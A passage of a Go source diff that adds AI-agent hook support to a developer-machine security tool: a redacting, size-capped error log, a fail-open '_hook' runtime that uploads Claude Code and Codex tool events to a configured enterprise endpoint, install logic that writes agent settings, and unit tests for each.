eventID string) { + path := errorLogPath() + if path == "" { + return + } + + entry := ErrorEntry{ + Timestamp: time.Now().UTC().Format(time.RFC3339Nano), + Stage: stage, + Code: code, + Message: redact.String(message), + EventID: eventID, + } + data, err := json.Marshal(entry) + if err != nil { + return + } + data = append(data, '\n') + + if err := os.MkdirAll(filepath.Dir(path), errorLogParentDirMode); err != nil { + return + } + + // Truncate-and-restart at the size cap. We stat first to avoid the + // truncate when the file is small (the common case). Failure here is + // non-fatal: if we can't stat or truncate, fall through to append + // anyway so the entry isn't lost on a non-cap-related stat error. 
+ if info, statErr := os.Stat(path); statErr == nil && info.Size() > MaxErrorLogBytes { + _ = os.Truncate(path, 0) + } + + f, err := os.OpenFile(path, os.O_WRONLY|os.O_CREATE|os.O_APPEND, errorLogFileMode) + if err != nil { + return + } + defer f.Close() + _, _ = f.Write(data) +} + +// ErrorLogPath returns the absolute path of the errors log for the +// current user (or the test override). Exposed for diagnostics paths +// that want to surface the location to the user. +func ErrorLogPath() string { + return errorLogPath() +} + +func errorLogPath() string { + if errorLogPathOverride != "" { + return errorLogPathOverride + } + home, err := os.UserHomeDir() + if err != nil || home == "" { + return "" + } + return filepath.Join(home, ".stepsecurity", ErrorLogFilename) +} + diff --git a/internal/aiagents/cli/errlog_test.go b/internal/aiagents/cli/errlog_test.go new file mode 100644 index 0000000..47cdfc6 --- /dev/null +++ b/internal/aiagents/cli/errlog_test.go @@ -0,0 +1,199 @@ +package cli + +import ( + "bufio" + "encoding/json" + "os" + "path/filepath" + "runtime" + "strings" + "testing" +) + +// withErrorLog redirects the errors log to a temp path for the test and +// restores the previous value on cleanup. Tests using this helper must +// not run in parallel — errorLogPathOverride is package-level state. 
+func withErrorLog(t *testing.T) string { + t.Helper() + tmp := filepath.Join(t.TempDir(), "errors.jsonl") + prev := errorLogPathOverride + errorLogPathOverride = tmp + t.Cleanup(func() { errorLogPathOverride = prev }) + return tmp +} + +func TestAppendError_CreatesFileWithMode0600(t *testing.T) { + if runtime.GOOS == "windows" { + t.Skip("file mode bits aren't preserved on Windows") + } + path := withErrorLog(t) + AppendError("install", "no_console_user", "running as root", "") + + info, err := os.Stat(path) + if err != nil { + t.Fatalf("stat: %v", err) + } + if info.Mode().Perm() != 0o600 { + t.Errorf("file mode = %o, want 0o600", info.Mode().Perm()) + } +} + +func TestAppendError_WritesJSONLEntry(t *testing.T) { + path := withErrorLog(t) + AppendError("upload", "http_500", "server error", "evt-abc") + + data, err := os.ReadFile(path) + if err != nil { + t.Fatalf("read: %v", err) + } + lines := strings.Split(strings.TrimRight(string(data), "\n"), "\n") + if len(lines) != 1 { + t.Fatalf("expected 1 line, got %d (%q)", len(lines), string(data)) + } + var entry ErrorEntry + if err := json.Unmarshal([]byte(lines[0]), &entry); err != nil { + t.Fatalf("unmarshal: %v (line=%q)", err, lines[0]) + } + if entry.Stage != "upload" || entry.Code != "http_500" || entry.Message != "server error" || entry.EventID != "evt-abc" { + t.Errorf("unexpected entry: %+v", entry) + } + if entry.Timestamp == "" { + t.Error("missing timestamp") + } +} + +func TestAppendError_OmitsEmptyEventID(t *testing.T) { + path := withErrorLog(t) + AppendError("install", "chown_failed", "permission denied", "") + + data, _ := os.ReadFile(path) + if strings.Contains(string(data), "event_id") { + t.Errorf("expected event_id field omitted when empty, got %q", string(data)) + } +} + +func TestAppendError_MultipleEntriesAppend(t *testing.T) { + path := withErrorLog(t) + AppendError("a", "1", "first", "") + AppendError("b", "2", "second", "evt-2") + AppendError("c", "3", "third", "") + + f, err := 
os.Open(path) + if err != nil { + t.Fatal(err) + } + defer f.Close() + scanner := bufio.NewScanner(f) + count := 0 + for scanner.Scan() { + count++ + var e ErrorEntry + if err := json.Unmarshal(scanner.Bytes(), &e); err != nil { + t.Errorf("line %d unmarshal: %v", count, err) + } + } + if count != 3 { + t.Errorf("expected 3 entries, got %d", count) + } +} + +func TestAppendError_TruncatesAtFiveMiB(t *testing.T) { + path := withErrorLog(t) + if err := os.MkdirAll(filepath.Dir(path), 0o700); err != nil { + t.Fatal(err) + } + // Pre-seed the file with > 5 MiB of garbage so the next AppendError + // trips the truncate-and-restart branch. + big := make([]byte, MaxErrorLogBytes+1024) + for i := range big { + big[i] = 'x' + } + if err := os.WriteFile(path, big, 0o600); err != nil { + t.Fatal(err) + } + + AppendError("install", "after_truncate", "fresh entry", "") + + info, err := os.Stat(path) + if err != nil { + t.Fatal(err) + } + if info.Size() >= int64(MaxErrorLogBytes) { + t.Errorf("expected file truncated and restarted, size = %d bytes", info.Size()) + } + data, _ := os.ReadFile(path) + if !strings.Contains(string(data), "after_truncate") { + t.Errorf("expected fresh entry after truncate, got %q", string(data)) + } +} + +func TestAppendError_NoHomeIsSilent(t *testing.T) { + prev := errorLogPathOverride + errorLogPathOverride = "" + t.Cleanup(func() { errorLogPathOverride = prev }) + + // Force the default-path branch with HOME unset. On Unix, t.Setenv + // works; on Windows os.UserHomeDir consults USERPROFILE/HOMEDRIVE, + // so we skip the assertion there — the contract under test is "no + // panic, silent drop" which is platform-independent in practice. + if runtime.GOOS != "windows" { + t.Setenv("HOME", "") + } + + // Must not panic, must not error, must not write anywhere observable. 
+ AppendError("install", "no_home", "should be silently dropped", "") +} + +func TestAppendError_TimestampIsUTCNanoFormat(t *testing.T) { + path := withErrorLog(t) + AppendError("test", "fmt", "checking timestamp", "") + + data, _ := os.ReadFile(path) + var entry ErrorEntry + if err := json.Unmarshal(data[:len(data)-1], &entry); err != nil { + t.Fatal(err) + } + // RFC3339Nano UTC timestamps end with 'Z'. + if !strings.HasSuffix(entry.Timestamp, "Z") { + t.Errorf("timestamp %q is not UTC RFC3339Nano (no trailing Z)", entry.Timestamp) + } +} + +func TestAppendError_RedactsMessage(t *testing.T) { + // AppendError must run the message through redact.String before it + // hits disk. A bearer token in the message must NOT survive in the + // on-disk JSONL line. + path := withErrorLog(t) + AppendError("upload", "http_500", + "failed POST with Authorization: Bearer eyJ.payload.sig.AAAAAAAAAAA", + "evt-1") + + data, err := os.ReadFile(path) + if err != nil { + t.Fatalf("read: %v", err) + } + if strings.Contains(string(data), "eyJ.payload.sig.AAAAAAAAAAA") { + t.Errorf("bearer leaked into error log: %s", string(data)) + } + if !strings.Contains(string(data), "[REDACTED]") { + t.Errorf("expected [REDACTED] placeholder in log line, got: %s", string(data)) + } +} + +func TestErrorLogPath_DefaultUnderHome(t *testing.T) { + // Don't override; test the default branch. 
+ prev := errorLogPathOverride + errorLogPathOverride = "" + t.Cleanup(func() { errorLogPathOverride = prev }) + + if runtime.GOOS == "windows" { + t.Skip("HOME isn't the canonical home env var on Windows") + } + t.Setenv("HOME", "/tmp/fake-home") + + got := ErrorLogPath() + want := "/tmp/fake-home/.stepsecurity/ai-agent-hook-errors.jsonl" + if got != want { + t.Errorf("ErrorLogPath = %q, want %q", got, want) + } +} diff --git a/internal/aiagents/cli/hook.go b/internal/aiagents/cli/hook.go new file mode 100644 index 0000000..922409a --- /dev/null +++ b/internal/aiagents/cli/hook.go @@ -0,0 +1,144 @@ +// Package cli houses entry points for the AI-agent hooks domain: +// `hooks install`, `hooks uninstall`, and the hidden `_hook` runtime. +// +// The runtime entry point intentionally lives outside internal/cli so the +// hot path can bypass cli.Parse and logger construction — agents invoke +// `_hook` on every event and a non-zero exit is treated as a hook +// failure / block. RunHook calls config.Load itself for the upload gate; +// the bypass is everything else in main's startup path. Fail-open is a +// hard contract enforced here. +package cli + +import ( + "context" + "io" + "os" + "time" + + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter" + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter/claudecode" + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter/codex" + aieventc "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/aiagents/hook" + "github.com/step-security/dev-machine-guard/internal/aiagents/ingest" + "github.com/step-security/dev-machine-guard/internal/config" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// RunHook is the hidden `_hook ` entry point. 
+// +// Contract (enforced by hook_test.go and main_test.go): +// - returns 0 on every code path, including malformed args, unknown agents, +// unparseable stdin, and internal panics +// - writes nothing to stdout unless emitting a valid agent-allow response +// - writes nothing to stderr on the success path +// +// args is os.Args[2:] — i.e., everything after the `_hook` verb. Two +// positional args are required (agent, hookEvent) and any additional or +// missing args fail-open silently. +func RunHook(stdin io.Reader, stdout, stderr io.Writer, args []string) int { + defer func() { + // Last-line defense: a panic anywhere in the runtime must still + // translate to exit 0 with no stdout. The recover swallows any + // stack trace so it never leaks to the agent. + _ = recover() + }() + + if len(args) != 2 { + return 0 + } + agent, hookEvent := args[0], args[1] + if agent == "" || hookEvent == "" { + return 0 + } + + ad := adapterForHookAgent(agent) + if ad == nil { + return 0 + } + + // Load process-wide config so ingest.Snapshot below sees the + // per-user credentials persisted by `configure`. Load is a silent + // no-op when the file is missing or malformed; the snapshot gate + // is the only thing that decides whether upload runs. + config.Load() + + rt := hook.NewRuntime(ad) + rt.Stdin = stdin + rt.Stdout = stdout + rt.Stderr = stderr + rt.Exec = executor.NewReal() + rt.LogError = AppendError + rt.UploadEvent = uploaderFactory() + + // Bound the entire invocation by the same cap the runtime would + // apply internally. Doubling the bound here is intentional: it lets + // a hung deferred response emit still complete inside the agent's + // own hook timeout. + ctx, cancel := context.WithTimeout(context.Background(), 2*hook.CapHook+1*time.Second) + defer cancel() + + _ = rt.Run(ctx, aieventc.HookEvent(hookEvent)) + return 0 +} + +// uploaderFactory is the seam RunHook uses to obtain the upload +// closure. 
Production points it at newUploader, which reads +// process-wide config and constructs an ingest.Client. Tests override +// it to keep _hook invocations from reaching the real network or +// reading a developer's per-user config. +var uploaderFactory = newUploader + +// newUploader builds the per-invocation upload seam used by the hook +// runtime. It returns nil — i.e., upload disabled — whenever enterprise +// config is missing or incomplete; the runtime treats nil as a no-op +// rather than an error, preserving the fail-open contract. When config +// is valid, the returned closure POSTs a single-element batch to the +// AI-agents endpoint and surfaces the transport error to the runtime, +// which logs it to errors.jsonl with the event_id. +func newUploader() func(context.Context, aieventc.Event) error { + cfg, ok := ingest.Snapshot() + if !ok { + return nil + } + client, ok := ingest.New(cfg, nil) + if !ok { + return nil + } + customerID := cfg.CustomerID + return func(ctx context.Context, ev aieventc.Event) error { + return client.UploadEvents(ctx, customerID, []aieventc.Event{ev}) + } +} + +// adapterForHookAgent maps the `_hook ` argument onto a +// constructed adapter. Returns nil for any unknown agent — the caller +// translates that to an exit-0 fail-open path. Constructed with the +// real user home directory and a self-resolved binary path so any +// adapter behavior that depends on those (e.g., logging the running +// binary) is consistent with what `hooks install` would have written. +func adapterForHookAgent(agent string) adapter.Adapter { + home, err := os.UserHomeDir() + if err != nil { + // No home → adapters that compute settings paths from $HOME + // would fail. Returning nil here short-circuits to the fail-open + // path; adapters that don't need home (none today) would still + // be reachable when one is added. + return nil + } + binaryPath, err := Resolve() + if err != nil { + // Self-path resolution failed (e.g., /proc unavailable). 
The + // adapter only uses the binary path for ShellCommand outputs, + // none of which are read on the hot path; an empty string keeps + // the runtime functional. + binaryPath = "" + } + switch agent { + case claudecode.AgentName: + return claudecode.New(home, binaryPath) + case codex.AgentName: + return codex.New(home, binaryPath) + } + return nil +} diff --git a/internal/aiagents/cli/hook_test.go b/internal/aiagents/cli/hook_test.go new file mode 100644 index 0000000..ce03a73 --- /dev/null +++ b/internal/aiagents/cli/hook_test.go @@ -0,0 +1,254 @@ +package cli + +import ( + "bytes" + "context" + "encoding/json" + "io" + "net/http" + "net/http/httptest" + "strings" + "sync" + "testing" + "time" + + aieventc "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/config" +) + +// withStubUploader replaces uploaderFactory with a capturing factory for +// the duration of the test. RunHook calls config.Load(), which mutates +// process-wide config globals from a developer's real +// ~/.stepsecurity/config.json — so we also snapshot-and-restore those +// globals to keep tests isolated from each other and from the host. +// The returned slice records every event the runtime tried to upload. 
+func withStubUploader(t *testing.T) *[]aieventc.Event { + t.Helper() + prev := uploaderFactory + var mu sync.Mutex + captured := make([]aieventc.Event, 0) + uploaderFactory = func() func(context.Context, aieventc.Event) error { + return func(_ context.Context, ev aieventc.Event) error { + mu.Lock() + defer mu.Unlock() + captured = append(captured, ev) + return nil + } + } + prevCID, prevEP, prevAK := config.CustomerID, config.APIEndpoint, config.APIKey + t.Cleanup(func() { + uploaderFactory = prev + config.CustomerID = prevCID + config.APIEndpoint = prevEP + config.APIKey = prevAK + }) + return &captured +} + +// TestRunHook_FailOpenContract asserts the fail-open contract on every +// ERROR path: exit 0, empty stdout, empty stderr. Adding parsing, stdin +// handling, policy evaluation, and upload paths must not introduce any +// non-zero exit or any stderr noise on these inputs. +// +// Valid calls (well-formed agent + event) are deliberately excluded: +// they're a different contract — exit 0 + a valid agent-allow JSON body +// on stdout — and belong in a separate wire-format test added with 2.8. 
+func TestRunHook_FailOpenContract(t *testing.T) { + withStubUploader(t) + cases := []struct { + name string + args []string + }{ + {"no args", nil}, + {"only agent", []string{"claude-code"}}, + {"only agent (codex)", []string{"codex"}}, + {"unsupported agent", []string{"windsurf", "PreToolUse"}}, + {"empty agent", []string{"", "PreToolUse"}}, + {"empty event", []string{"claude-code", ""}}, + {"trailing extras", []string{"claude-code", "PreToolUse", "extra", "args"}}, + } + + for _, tc := range cases { + t.Run(tc.name, func(t *testing.T) { + var stdout, stderr bytes.Buffer + rc := RunHook(bytes.NewReader(nil), &stdout, &stderr, tc.args) + if rc != 0 { + t.Errorf("expected exit 0 (fail-open contract), got %d", rc) + } + if stdout.Len() != 0 { + t.Errorf("expected empty stdout on error path, got %q", stdout.String()) + } + if stderr.Len() != 0 { + t.Errorf("expected empty stderr on error path, got %q", stderr.String()) + } + }) + } +} + +// TestRunHook_ValidPayloadEmitsAllow exercises the wire-format contract +// for well-formed inputs: a recognized agent + event with a parseable +// payload returns exit 0 and emits a valid JSON allow response on stdout. +// This pins the success path that the fail-open test deliberately +// excludes. +func TestRunHook_ValidPayloadEmitsAllow(t *testing.T) { + withStubUploader(t) + cases := []struct { + name string + agent string + hookEvent string + payload string + // expectAllowKey is "continue" for Claude (non-empty allow body) + // and "" for Codex (allow body is the empty object {}). 
+ expectAllowKey string + }{ + { + name: "claude-code PreToolUse Bash", + agent: "claude-code", + hookEvent: "PreToolUse", + payload: `{"tool_name":"Bash","tool_input":{"command":"ls"}}`, + expectAllowKey: "continue", + }, + { + name: "codex PreToolUse Bash", + agent: "codex", + hookEvent: "PreToolUse", + payload: `{"tool_name":"Bash","tool_input":{"command":"ls"}}`, + expectAllowKey: "", + }, + } + for _, tc := range cases { + t.Run(tc.name, func(t *testing.T) { + var stdout, stderr bytes.Buffer + rc := RunHook(strings.NewReader(tc.payload), &stdout, &stderr, []string{tc.agent, tc.hookEvent}) + if rc != 0 { + t.Errorf("expected exit 0, got %d", rc) + } + if stderr.Len() != 0 { + t.Errorf("expected empty stderr, got %q", stderr.String()) + } + body := bytes.TrimSpace(stdout.Bytes()) + var resp map[string]any + if err := json.Unmarshal(body, &resp); err != nil { + t.Fatalf("stdout not valid JSON: %v: %q", err, body) + } + if tc.expectAllowKey != "" && resp[tc.expectAllowKey] != true { + t.Errorf("expected %q=true in allow response, got %v", tc.expectAllowKey, resp) + } + if tc.expectAllowKey == "" && len(resp) != 0 { + t.Errorf("expected empty-object allow response, got %v", resp) + } + }) + } +} + +// TestRunHook_RealUploadWiring exercises the full upload path without +// the uploaderFactory stub: RunHook → config.Load → newUploader → +// ingest.Client → httptest.Server. This is the only test that proves +// config-staged credentials actually drive a real POST through the +// wire-format we ship; the seam-stubbed tests intentionally +// short-circuit before that wiring. 
+func TestRunHook_RealUploadWiring(t *testing.T) { + type captured struct { + method string + path string + auth string + ua string + body []byte + } + gotCh := make(chan captured, 1) + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + body, _ := io.ReadAll(r.Body) + gotCh <- captured{ + method: r.Method, + path: r.URL.Path, + auth: r.Header.Get("Authorization"), + ua: r.Header.Get("User-Agent"), + body: body, + } + w.WriteHeader(http.StatusAccepted) + })) + t.Cleanup(srv.Close) + + // Stage credentials BEFORE config.Load runs inside RunHook. Load + // only overrides placeholder (`{{...}}`) globals, so these stay put. + prevCID, prevEP, prevAK := config.CustomerID, config.APIEndpoint, config.APIKey + config.CustomerID = "cus_e2e" + config.APIEndpoint = srv.URL + config.APIKey = "sk_e2e_secret" + t.Cleanup(func() { + config.CustomerID = prevCID + config.APIEndpoint = prevEP + config.APIKey = prevAK + }) + + // Deliberately do NOT call withStubUploader — we want the real + // uploaderFactory → newUploader → ingest.New path to run. 
+ var stdout, stderr bytes.Buffer + rc := RunHook( + strings.NewReader(`{"tool_name":"Bash","tool_input":{"command":"ls"}}`), + &stdout, &stderr, + []string{"claude-code", "PreToolUse"}, + ) + if rc != 0 { + t.Fatalf("exit = %d, want 0 (stderr=%q)", rc, stderr.String()) + } + + var got captured + select { + case got = <-gotCh: + case <-time.After(3 * time.Second): + t.Fatal("no upload received within 3s — wiring broken") + } + + if got.method != http.MethodPost { + t.Errorf("method=%s, want POST", got.method) + } + if got.path != "/v1/cus_e2e/ai-agents/events" { + t.Errorf("path=%q, want /v1/cus_e2e/ai-agents/events", got.path) + } + if got.auth != "Bearer sk_e2e_secret" { + t.Errorf("auth=%q", got.auth) + } + if !strings.HasPrefix(got.ua, "dmg/") { + t.Errorf("user-agent=%q, want dmg/", got.ua) + } + var arr []map[string]any + if err := json.Unmarshal(got.body, &arr); err != nil { + t.Fatalf("body not JSON array: %v: %q", err, got.body) + } + if len(arr) != 1 { + t.Fatalf("expected 1 event, got %d: %v", len(arr), arr) + } + if arr[0]["customer_id"] != "cus_e2e" { + t.Errorf("event.customer_id=%v, want cus_e2e", arr[0]["customer_id"]) + } + if arr[0]["hook_event"] != string(aieventc.HookPreToolUse) { + t.Errorf("event.hook_event=%v, want %q", arr[0]["hook_event"], aieventc.HookPreToolUse) + } +} + +// TestRunHook_InvokesUploaderSeam pins the upload wiring: a valid +// `_hook claude-code PreToolUse` invocation must dispatch through +// uploaderFactory(). The factory itself decides whether a real upload +// happens (it returns nil when enterprise config is missing); this +// test only checks that the runtime calls the seam the factory +// returns. 
+func TestRunHook_InvokesUploaderSeam(t *testing.T) { + captured := withStubUploader(t) + + var stdout, stderr bytes.Buffer + rc := RunHook( + strings.NewReader(`{"tool_name":"Bash","tool_input":{"command":"ls"}}`), + &stdout, &stderr, + []string{"claude-code", "PreToolUse"}, + ) + if rc != 0 { + t.Fatalf("exit = %d, want 0", rc) + } + if len(*captured) != 1 { + t.Fatalf("uploader called %d times, want 1", len(*captured)) + } + if (*captured)[0].HookEvent != aieventc.HookPreToolUse { + t.Errorf("uploaded event hook=%q, want PreToolUse", (*captured)[0].HookEvent) + } +} diff --git a/internal/aiagents/cli/install.go b/internal/aiagents/cli/install.go new file mode 100644 index 0000000..1e47df2 --- /dev/null +++ b/internal/aiagents/cli/install.go @@ -0,0 +1,131 @@ +package cli + +import ( + "context" + "fmt" + "io" + "strings" + + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter" + "github.com/step-security/dev-machine-guard/internal/aiagents/ingest" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// resolveBinary is the seam install/uninstall use to obtain the +// absolute, symlink-resolved DMG binary path. Production calls +// Resolve(); tests override to avoid depending on a real on-disk +// binary or to drive the resolver-failure branch. +var resolveBinary = Resolve + +// RunInstall is the entry point for `hooks install`. +// +// agent is the --agent flag value; "" means "every detected agent". +// stdout/stderr are the writers main wires from os.Stdout/os.Stderr. +// +// Returns the desired process exit code: +// - 0 on success, idempotent no-op, no agents detected, or the +// root-with-no-console-user no-op. +// - 1 on enterprise-config gate failure, self-path resolution +// failure, unsupported --agent, or any adapter Install error. +// +// Flow: +// 1. enterprise-config gate (all three credentials present and +// non-placeholder) +// 2. resolve target user (root + no console user → log + exit 0) +// 3. 
resolve absolute, symlink-resolved DMG binary path +// 4. select adapters per --agent or detection on $PATH +// 5. per-adapter Install, then chown all outputs to target user +// under root +// 6. emit per-adapter summary to stdout +// +// Adapter Install errors don't abort the loop — the remaining +// adapters still get a chance. The aggregate exit code is 1 if any +// adapter failed. +func RunInstall(ctx context.Context, exec executor.Executor, agent string, stdout, stderr io.Writer) int { + if _, ok := ingest.Snapshot(); !ok { + fmt.Fprintln(stderr, "Enterprise configuration not found or incomplete.") + fmt.Fprintln(stderr, "Run `stepsecurity-dev-machine-guard configure` to set customer_id, api_endpoint, and api_key.") + AppendError("install", "enterprise_config_missing", "ingest.Snapshot returned not-ok", "") + return 1 + } + + target, ok := ResolveTargetUser(exec, stderr) + if !ok { + return 0 + } + + binaryPath, err := resolveBinary() + if err != nil { + fmt.Fprintf(stderr, "stepsecurity-dev-machine-guard: cannot resolve own binary path: %v\n", err) + AppendError("install", "selfpath_failed", err.Error(), "") + return 1 + } + + adapters, err := selectAdapters(ctx, agent, target.HomeDir, binaryPath, exec) + if err != nil { + fmt.Fprintf(stderr, "stepsecurity-dev-machine-guard: %v\n", err) + AppendError("install", "select_adapters_failed", err.Error(), "") + return 1 + } + if len(adapters) == 0 { + fmt.Fprintln(stdout, "No supported AI coding agents detected on $PATH.") + fmt.Fprintf(stdout, "Pass --agent to install for a specific agent (supported: %s).\n", + strings.Join(SupportedAgents, ", ")) + return 0 + } + + exit := 0 + for _, a := range adapters { + res, err := a.Install(ctx) + if err != nil { + fmt.Fprintf(stderr, "%s: install failed: %v\n", a.Name(), err) + AppendError("install", "adapter_install_failed", + fmt.Sprintf("%s: %v", a.Name(), err), "") + exit = 1 + // Skip chown on failure: the partial state is already + // inconsistent, and a chown sweep 
can't unbreak it. + continue + } + // Under root, chown every file written or created + // (settings, .dmg-*.bak siblings, parent dirs). + // ChownToTarget short-circuits to a no-op when not root. + ChownToTarget(exec, installChownPaths(res), target) + printInstallResult(stdout, a.Name(), res) + } + return exit +} + +// installChownPaths is the chown sweep set for a single adapter's +// InstallResult. Order is shallowest-parent-first (CreatedDirs are +// pushed by the adapter in that order) so a recursive chown could +// stop at a parent without revisiting children — though the current +// helper chowns each entry individually. +func installChownPaths(r adapter.InstallResult) []string { + out := make([]string, 0, len(r.CreatedDirs)+len(r.WrittenFiles)+len(r.BackupFiles)) + out = append(out, r.CreatedDirs...) + out = append(out, r.WrittenFiles...) + out = append(out, r.BackupFiles...) + return out +} + +// printInstallResult renders one adapter's InstallResult for the +// user. The format is intentionally line-oriented rather than tabular +// so partial output during multi-agent installs reads naturally. 
+func printInstallResult(w io.Writer, name string, r adapter.InstallResult) { + fmt.Fprintf(w, "%s:\n", name) + if len(r.HooksAdded) > 0 { + fmt.Fprintf(w, " added: %v\n", r.HooksAdded) + } + if len(r.HooksKept) > 0 { + fmt.Fprintf(w, " unchanged: %v\n", r.HooksKept) + } + for _, f := range r.WrittenFiles { + fmt.Fprintf(w, " wrote: %s\n", f) + } + for _, f := range r.BackupFiles { + fmt.Fprintf(w, " backup: %s\n", f) + } + for _, n := range r.Notes { + fmt.Fprintf(w, " note: %s\n", n) + } +} diff --git a/internal/aiagents/cli/install_test.go b/internal/aiagents/cli/install_test.go new file mode 100644 index 0000000..f548009 --- /dev/null +++ b/internal/aiagents/cli/install_test.go @@ -0,0 +1,368 @@ +package cli + +import ( + "bytes" + "context" + "errors" + "os" + "path/filepath" + "runtime" + "strings" + "testing" + + "github.com/step-security/dev-machine-guard/internal/config" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// withEnterpriseConfig stages valid (non-empty, non-placeholder) values +// in the package-level config vars that ingest.Snapshot reads, restoring +// the previous values on cleanup. Tests using this helper must not run +// in parallel — config vars are package-level state. +func withEnterpriseConfig(t *testing.T) { + t.Helper() + prevCID, prevEP, prevAK := config.CustomerID, config.APIEndpoint, config.APIKey + config.CustomerID = "cust-test" + config.APIEndpoint = "https://api.example.com" + config.APIKey = "secret-test" + t.Cleanup(func() { + config.CustomerID = prevCID + config.APIEndpoint = prevEP + config.APIKey = prevAK + }) +} + +// withResolveBinary overrides the install-time selfpath resolver with a +// fixed value (or error). The default Resolve() reads os.Executable +// which under `go test` points at the test binary — fine in principle, +// but pinning a known value keeps the hook commands written to settings +// readable in failure output. 
+func withResolveBinary(t *testing.T, fn func() (string, error)) { + t.Helper() + prev := resolveBinary + resolveBinary = fn + t.Cleanup(func() { resolveBinary = prev }) +} + +const fakeBinary = "/usr/local/bin/stepsecurity-dev-machine-guard" + +func okBinary() (string, error) { return fakeBinary, nil } + +// newInstallMock returns a Mock executor configured as a non-root user +// whose home is `home`. Callers add SetPath entries for the agents they +// want detected. +func newInstallMock(t *testing.T, home string) *executor.Mock { + t.Helper() + m := executor.NewMock() + m.SetIsRoot(false) + m.SetUsername("alice") + m.SetHomeDir(home) + return m +} + +func TestRunInstall_NoEnterpriseConfig_Exit1(t *testing.T) { + logPath := withErrorLog(t) + // Leave config vars as their default placeholders ({{...}}) — no + // withEnterpriseConfig call. ingest.Snapshot returns ok=false on + // placeholders. + + var stdout, stderr bytes.Buffer + m := executor.NewMock() + rc := RunInstall(context.Background(), m, "", &stdout, &stderr) + if rc != 1 { + t.Fatalf("exit = %d, want 1", rc) + } + if !strings.Contains(stderr.String(), "Enterprise configuration not found") { + t.Errorf("stderr missing diagnostic, got: %q", stderr.String()) + } + data, err := os.ReadFile(logPath) + if err != nil { + t.Fatalf("expected errors log entry: %v", err) + } + if !strings.Contains(string(data), "enterprise_config_missing") { + t.Errorf("errlog missing code, got: %q", string(data)) + } +} + +func TestRunInstall_PlaceholderConfig_Exit1(t *testing.T) { + withErrorLog(t) + // Explicitly stage a placeholder in one field — the stricter gate + // must reject build-time placeholders even when the other two + // values look valid. 
+ prevCID, prevEP, prevAK := config.CustomerID, config.APIEndpoint, config.APIKey + config.CustomerID = "cust-1" + config.APIEndpoint = "{{API_ENDPOINT}}" + config.APIKey = "secret" + t.Cleanup(func() { + config.CustomerID = prevCID + config.APIEndpoint = prevEP + config.APIKey = prevAK + }) + + var stdout, stderr bytes.Buffer + m := executor.NewMock() + if rc := RunInstall(context.Background(), m, "", &stdout, &stderr); rc != 1 { + t.Fatalf("exit = %d, want 1", rc) + } +} + +func TestRunInstall_RootNoConsoleUser_Exit0(t *testing.T) { + withEnterpriseConfig(t) + logPath := withErrorLog(t) + withResolveBinary(t, okBinary) + + m := executor.NewMock() + m.SetIsRoot(true) + // "root" simulates the executor failing to resolve a console user. + m.SetUsername("root") + m.SetHomeDir("/var/root") + + var stdout, stderr bytes.Buffer + rc := RunInstall(context.Background(), m, "", &stdout, &stderr) + if rc != 0 { + t.Fatalf("root + no console user: exit = %d, want 0", rc) + } + if !strings.Contains(stderr.String(), "no console user") { + t.Errorf("stderr missing the bail note, got: %q", stderr.String()) + } + // errors.jsonl should record the bail. 
+ data, err := os.ReadFile(logPath) + if err != nil { + t.Fatalf("expected errlog entry on root-no-console-user: %v", err) + } + if !strings.Contains(string(data), "no_console_user") { + t.Errorf("errlog missing no_console_user code, got: %q", string(data)) + } +} + +func TestRunInstall_SelfPathFails_Exit1(t *testing.T) { + withEnterpriseConfig(t) + logPath := withErrorLog(t) + withResolveBinary(t, func() (string, error) { + return "", errors.New("mock selfpath failure") + }) + + home := t.TempDir() + m := newInstallMock(t, home) + + var stdout, stderr bytes.Buffer + if rc := RunInstall(context.Background(), m, "", &stdout, &stderr); rc != 1 { + t.Fatalf("exit = %d, want 1", rc) + } + if !strings.Contains(stderr.String(), "cannot resolve own binary path") { + t.Errorf("stderr missing diagnostic, got: %q", stderr.String()) + } + if data, _ := os.ReadFile(logPath); !strings.Contains(string(data), "selfpath_failed") { + t.Errorf("errlog missing selfpath_failed code, got: %q", string(data)) + } +} + +func TestRunInstall_UnsupportedAgent_Exit1(t *testing.T) { + withEnterpriseConfig(t) + withErrorLog(t) + withResolveBinary(t, okBinary) + + home := t.TempDir() + m := newInstallMock(t, home) + + var stdout, stderr bytes.Buffer + rc := RunInstall(context.Background(), m, "cursor", &stdout, &stderr) + if rc != 1 { + t.Fatalf("exit = %d, want 1", rc) + } + if !strings.Contains(stderr.String(), "unsupported agent") { + t.Errorf("stderr missing unsupported-agent diagnostic, got: %q", stderr.String()) + } +} + +func TestRunInstall_NoAgentsDetected_Exit0(t *testing.T) { + withEnterpriseConfig(t) + withErrorLog(t) + withResolveBinary(t, okBinary) + + home := t.TempDir() + m := newInstallMock(t, home) // no SetPath, nothing detected + + var stdout, stderr bytes.Buffer + rc := RunInstall(context.Background(), m, "", &stdout, &stderr) + if rc != 0 { + t.Fatalf("exit = %d, want 0 (no detection is not an error)", rc) + } + out := stdout.String() + if !strings.Contains(out, "No 
supported AI coding agents detected") { + t.Errorf("stdout missing no-detected message, got: %q", out) + } + // User should learn about the --agent escape hatch and the agent + // names — without that they have no way to recover from a buggy + // detection result. + if !strings.Contains(out, "--agent") || !strings.Contains(out, "claude-code") || !strings.Contains(out, "codex") { + t.Errorf("stdout missing --agent escape-hatch hint, got: %q", out) + } +} + +func TestRunInstall_InstallsClaudeCode(t *testing.T) { + withEnterpriseConfig(t) + withErrorLog(t) + withResolveBinary(t, okBinary) + + home := t.TempDir() + m := newInstallMock(t, home) + m.SetPath("claude", "/usr/local/bin/claude") + + var stdout, stderr bytes.Buffer + rc := RunInstall(context.Background(), m, "", &stdout, &stderr) + if rc != 0 { + t.Fatalf("exit = %d, want 0 (stderr=%q)", rc, stderr.String()) + } + + settings := filepath.Join(home, ".claude", "settings.json") + data, err := os.ReadFile(settings) + if err != nil { + t.Fatalf("expected settings file written at %s: %v", settings, err) + } + // The hook command must include the resolved binary path AND the + // canonical `_hook claude-code` invocation prefix — that's what + // uninstall later matches against. 
